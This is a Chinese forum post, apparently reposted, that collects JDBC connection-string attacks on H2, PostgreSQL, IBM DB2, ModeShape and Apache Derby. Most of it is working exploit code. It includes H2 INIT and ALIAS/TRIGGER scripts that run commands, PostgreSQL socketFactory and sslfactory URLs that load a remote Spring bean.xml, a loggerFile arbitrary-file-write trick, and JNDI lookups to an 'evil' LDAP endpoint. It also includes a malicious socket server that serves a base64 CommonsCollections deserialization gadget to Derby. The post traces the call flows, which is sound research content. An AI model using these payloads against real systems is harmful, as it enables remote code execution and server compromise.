JDBC数据库汇总Attack研究

卖不甜枣  金牌会员 | 2024-5-17 18:05:20 | 显示全部楼层 | 阅读模式
打印 上一主题 下一主题
楼主

主题 911|帖子 911|积分 2733

前言

针对除Mysql的别的数据库的jdbc attack分析
H2 RCE

先容

H2 是一个用 Java 开发的嵌入式数据库,它自己只是一个类库,即只有一个 jar 文件,可以直接嵌入到应用项目中。H2 主要有如下三个用途:

  • 第一个用途,也是最常利用的用途就在于可以同应用程序打包在一起发布,这样可以非常方便地存储少量结构化数据。
  • 第二个用途是用于单位测试。启动速率快,而且可以关闭持久化功能,每一个用例执行完随即还原到初始状态。
  • 第三个用途是作为缓存,即当做内存数据库,作为NoSQL的一个补充。当某些场景下数据模子必须为关系型,可以拿它当Memcached使,作为后端MySQL/Oracle的一个缓冲层,缓存一些不经常变革但需要频繁访问的数据,比如字典表、权限表。
搭建

下载:http://www.h2database.com/html/download.html
看说明书搭建就行
INIT RunScript RCE

在H2数据库进行初始化的时候或者当我们可以控制JDBC链接时即可完成RCE,并且有很多利用,首先就是INIT,进行H2连接的时候可以执行一段SQL脚本,我们可以构造恶意的脚本去RCE
  1. CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException{Runtime.getRuntime().exec(cmd);return "hacker";}';CALL EXEC('calc')
复制代码
控制JDBC URL为jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://127.0.0.1:8000/poc.sql',点击连接,即可弹出计算器,这种方法得需要账号密码精确
Alias Script RCE

假如可以执行恣意H2 SQL的语句,那么也可以完成RCE,其实上述的INIT实质上也就是执行恣意H2的sql语句。而执行语句也有很多讲求。对于上述的INIT需要出网,而我们可以利用加载字节码达到不出网RCE的效果,雷同于SPEL以及OGNL注入内存马。
CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;CALL SHELLEXEC('whoami');

TRIGGER Script RCE

除了Alias别名还可以用TRIGGER去手搓groovy或者js代码去rce,但是groovy依赖一样平常都是不会有的,所以js是更加通用的选择
  1. // groovy
  2. Class.forName("org.h2.Driver");
  3. String groovy = "@groovy.transform.ASTTest(value={" + " assert java.lang.Runtime.getRuntime().exec("calc")" + "})" + "def x";
  4. String url    = "jdbc:h2:mem:test;MODE=MSSQLServer;init=CREATE ALIAS T5 AS '" + groovy + "'";
  6. // js
  7. CREATE TRIGGER poc2 BEFORE SELECT ON
  8. INFORMATION_SCHEMA.TABLES AS $$//javascript
  9. java.lang.Runtime.getRuntime().exec("calc") $$;
复制代码
TRIGGER没法在INIT处利用
PostgreSQL JDBC RCE

socketFactory/socketFactoryArg RCE

环境搭建
  1. <dependency>
  2.   <groupId>org.postgresql</groupId>
  3.   <artifactId>postgresql</artifactId>
  4.   <version>42.3.1</version>
  5. </dependency>
  6. <dependency>
  7.   <groupId>org.springframework</groupId>
  8.   <artifactId>spring-context-support</artifactId>
  9.   <version>5.3.23</version>
  10. </dependency>
复制代码
  1. package com.ctf;
  3. import java.sql.Connection;
  4. import java.sql.DriverManager;
  5. import java.sql.SQLException;
  7. public class PsqlJdbcRce {
  8.     public static void main(String[] args) throws SQLException {
  9.         String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
  10.         String socketFactoryArg = "http://127.0.0.1:8888/bean.xml";
  11.         String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg;
  12.         Connection connection = DriverManager.getConnection(jdbcUrl);
  13.         connection.close();
  14.     }
  15. }
复制代码
  1. <beans xmlns="http://www.springframework.org/schema/beans"
  2.   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  3.   xmlns:p="http://www.springframework.org/schema/p"
  4.   xsi:schemaLocation="http://www.springframework.org/schema/beans
  5.   http://www.springframework.org/schema/beans/spring-beans.xsd">
  6.   <bean id="pb" >
  7.     <constructor-arg value="calc.exe" />
  8.     <property name="whatever" value="#{ pb.start() }"/>
  9.   </bean>
  10. </beans>
复制代码
postgresql数据库自己搭建,运行代码即可弹出计算器
调用流程

一张图概括postgres jdbc攻击流程(先知社区的引用一下,如有侵权联系博主删除

在psql的jdbc初始化的时候会读取jdbc链接里的某些参数,并且进行一些利用,断点调试,跟着图中流程走


进入makeConnection,过,到这

进入openConnection

进入openConnectionImpl

进入getSocketFactory,注意这个传入的info就是上面的props

这里开始从info中获取信息,先获取的socketFactoryClassName然后进入instantiate

实例化org.springframework.context.support.ClassPathXmlApplicationContext,传入的args是http://127.0.0.1:8888/bean.xml,实例化我们自界说的bean,造成了rce
sslfactory/sslfactoryarg RCE

跟上面流程差不多,不过这里得注意postgresql数据库得开启ssl,配置文件里设置ssl=on
  1. package com.ctf;
  3. import java.sql.Connection;
  4. import java.sql.DriverManager;
  5. import java.sql.SQLException;
  7. public class PsqlJdbcRce {
  8.     public static void main(String[] args) throws SQLException {
  9.         String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
  10.         String socketFactoryArg = "http://127.0.0.1:8888/bean.xml";
  11. //        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg;
  12.         String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?sslfactory="+socketFactoryClass+"&sslfactoryarg="+socketFactoryArg;
  13.         Connection connection = DriverManager.getConnection(jdbcUrl);
  14.         connection.close();
  15.     }
  16. }
复制代码
loggerLevel/loggerFile 恣意文件写入

  1. package com.ctf;
  3. import java.sql.Connection;
  4. import java.sql.DriverManager;
  5. import java.sql.SQLException;
  7. public class PsqlJdbcRce {
  8.     public static void main(String[] args) throws SQLException {
  9. //        String socketFactoryClass = "org.springframework.context.support.ClassPathXmlApplicationContext";
  10. //        String socketFactoryArg = "http://127.0.0.1:8888/bean.xml";
  11. ////        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?socketFactory="+socketFactoryClass+"&socketFactoryArg="+socketFactoryArg;
  12. //        String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/postgres/?sslfactory="+socketFactoryClass+"&sslfactoryarg="+socketFactoryArg;
  13. //        Connection connection = DriverManager.getConnection(jdbcUrl);
  14. //        connection.close();
  15.         String loggerLevel = "debug";
  16.         String loggerFile = "test.txt";
  17.         String shellContent="test";
  18.         String jdbcUrl = "jdbc:postgresql://127.0.0.1:5432/test?loggerLevel="+loggerLevel+"&loggerFile="+loggerFile+ "&"+shellContent;
  19.         Connection connection = DriverManager.getConnection(jdbcUrl);
  20.     }
  21. }
复制代码
可以实现跨目录写文件
IBM DB2 JDBC JNDI RCE

环境搭建
  1. <dependency>
  2.   <groupId>com.ibm.db2</groupId>
  3.   <artifactId>jcc</artifactId>
  4.   <version>11.5.0.0</version>
  5. </dependency>
复制代码
docker拉个DB2数据库
docker pull ibmoms/db2express-c
docker run -itd --name db2 --privileged=true -p 50000:50000 -e DB2INST1_PASSWORD=db2admin -e LICENSE=accept ibmoms/db2express-c db2start
  1. package com.ctf;
  3. import java.sql.DriverManager;
  4. import java.sql.SQLException;
  6. public class DB2JDBCRCE {
  7.     public static void main(String[] args) throws ClassNotFoundException, SQLException {
  8.         Class.forName("com.ibm.db2.jcc.DB2Driver");
  9.         DriverManager.getConnection("jdbc:db2://127.0.0.1:50000/BLUDB:clientRerouteServerListJNDIName=ldap://127.0.0.1:1099/evil;");
  10.     }
  11. }
复制代码
调试流程

颠末一系列不知道什么的东西,终极定位到com.ibm.db2.jcc.am

达到jndi的效果
ModeShape JDBC JNDI RCE

先容

ModeShape是一个分层的、事务性的、一致的数据存储库,支持查询、全文搜刮、事件、版本控制、引用和灵活的动态模式。它非常快,高可用性,高度可伸缩,并且是100%开源的,用Java编写的。客户端利用(JSR-283)标准的Java API或者ModeShape的Rest API,可以通过JDBC和SQL查询内容。
环境搭建
  1. <dependency>
  2.     <groupId>org.modeshape</groupId>
  3.     <artifactId>modeshape-jdbc</artifactId>
  4.     <version>5.4.1.Final</version>
  5. </dependency>
  7. <dependency>
  8.     <groupId>org.modeshape</groupId>
  9.     <artifactId>modeshape-common</artifactId>
  10.     <version>5.4.1.Final</version>
  11. </dependency>
复制代码
  1. package com.ctf;
  3. import java.sql.DriverManager;
  4. import java.sql.SQLException;
  6. public class modeshapJNDI {
  7.     public static void main(String[] args) throws ClassNotFoundException, SQLException {
  8.         Class.forName("org.modeshape.jdbc.LocalJcrDriver");
  9.         DriverManager.getConnection("jdbc:jcr:jndi:ldap://127.0.0.1:1099/evil");
  10.     }
  11. }
复制代码
流程分析


进入createConnection

进入initRepository,触发lookup

Apache Derby

环境搭建
  1. <dependency>
  2.     <groupId>org.apache.derby</groupId>
  3.     <artifactId>derby</artifactId>
  4.     <version>10.10.1.1</version>
  5. </dependency>
  6. <dependency>
  7.     <groupId>commons-collections</groupId>
  8.     <artifactId>commons-collections</artifactId>
  9.     <version>3.2.1</version>
  10. </dependency>
复制代码
攻击流程

准备一个恶意Socket服务端
  1. package com.ctf;
  3. import java.io.IOException;
  4. import java.net.ServerSocket;
  5. import java.net.Socket;
  6. import java.util.Base64;
  7. import java.util.concurrent.TimeUnit;
  9. public class EvilServer {
  10.     public static void main(String[] args) throws IOException, InterruptedException {
  11.         int port = 4851;
  12.         ServerSocket server = new ServerSocket(port);
  13.         Socket socket = server.accept();
  14.         // CC6
  15.         String evil="rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IANG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5rZXl2YWx1ZS5UaWVkTWFwRW50cnmKrdKbOcEf2wIAAkwAA2tleXQAEkxqYXZhL2xhbmcvT2JqZWN0O0wAA21hcHQAD0xqYXZhL3V0aWwvTWFwO3hwcHNyACpvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMubWFwLkxhenlNYXBu5ZSCnnkQlAMAAUwAB2ZhY3Rvcnl0ACxMb3JnL2FwYWNoZS9jb21tb25zL2NvbGxlY3Rpb25zL1RyYW5zZm9ybWVyO3hwc3IAOm9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5mdW5jdG9ycy5DaGFpbmVkVHJhbnNmb3JtZXIwx5fsKHqXBAIAAVsADWlUcmFuc2Zvcm1lcnN0AC1bTG9yZy9hcGFjaGUvY29tbW9ucy9jb2xsZWN0aW9ucy9UcmFuc2Zvcm1lcjt4cHVyAC1bTG9yZy5hcGFjaGUuY29tbW9ucy5jb2xsZWN0aW9ucy5UcmFuc2Zvcm1lcju9Virx2DQYmQIAAHhwAAAABHNyADtvcmcuYXBhY2hlLmNvbW1vbnMuY29sbGVjdGlvbnMuZnVuY3RvcnMuQ29uc3RhbnRUcmFuc2Zvcm1lclh2kBFBArGUAgABTAAJaUNvbnN0YW50cQB+AAN4cHZyABFqYXZhLmxhbmcuUnVudGltZQAAAAAAAAAAAAAAeHBzcgA6b3JnLmFwYWNoZS5jb21tb25zLmNvbGxlY3Rpb25zLmZ1bmN0b3JzLkludm9rZXJUcmFuc2Zvcm1lcofo/2t7fM44AgADWwAFaUFyZ3N0ABNbTGphdmEvbGFuZy9PYmplY3Q7TAALaU1ldGhvZE5hbWV0ABJMamF2YS9sYW5nL1N0cmluZztbAAtpUGFyYW1UeXBlc3QAEltMamF2YS9sYW5nL0NsYXNzO3hwdXIAE1tMamF2YS5sYW5nLk9iamVjdDuQzlifEHMpbAIAAHhwAAAAAnQACmdldFJ1bnRpbWVwdAARZ2V0RGVjbGFyZWRNZXRob2R1cgASW0xqYXZhLmxhbmcuQ2xhc3M7qxbXrsvNWpkCAAB4cAAAAAJ2cgAQamF2YS5sYW5nLlN0cmluZ6DwpDh6O7NCAgAAeHB2cQB+ABtzcQB+ABJ1cQB+ABcAAAACcHB0AAZpbnZva2V1cQB+ABsAAAACdnIAEGphdmEubGFuZy5PYmplY3QAAAAAAAAAAAAAAHhwdnEAfgAXc3EAfgASdXEAfgAXAAAAAXQABGNhbGN0AARleGVjdXEAfgAbAAAAAXEAfgAec3EAfgAAP0AAAAAAAAx3CAAAABAAAAAAeHhweA==";
  16.         byte[] decode = Base64.getDecoder().decode(evil);
  17.         // 直接向 socket 中写入
  18.         socket.getOutputStream().write(decode);
  19.         socket.getOutputStream().flush();
  20.         Thread.sleep(TimeUnit.SECONDS.toMillis(5));
  21.         socket.close();
  22.         server.close();
  23.     }
  24. }
复制代码
  1. package com.ctf;
  3. import java.sql.DriverManager;
  4. import java.sql.SQLException;
  6. public class demo {
  7.     public static void main(String[] args) throws ClassNotFoundException, SQLException {
  8.         Class.forName("org.apache.derby.jdbc.EmbeddedDriver");
  9. //        DriverManager.getConnection("jdbc:derby:dbname;create=true");
  10.         DriverManager.getConnection("jdbc:derby:dbname;startMaster=true;slaveHost=127.0.0.1");
  11.     }
  12. }
复制代码
这里先执行create=true,然后在执行下面这句,可以弹计算器
ReplicationMessageTransmit下的readMessage方法会对socket连接拿到的数据直接进行反序列化



免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览
返回列表

快速回复

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

卖不甜枣

金牌会员
这个人很懒什么都没写!

楼主热帖

标签云

存储 挺好的 服务器
微信订阅号
微信服务号
微信客服
小程序
H5
关于我们 商务合作 网站地图
©Copyright 2022-2024 杭州祥升科技有限公司 版权所有 浙ICP备20004199号
快速回复 返回顶部 返回列表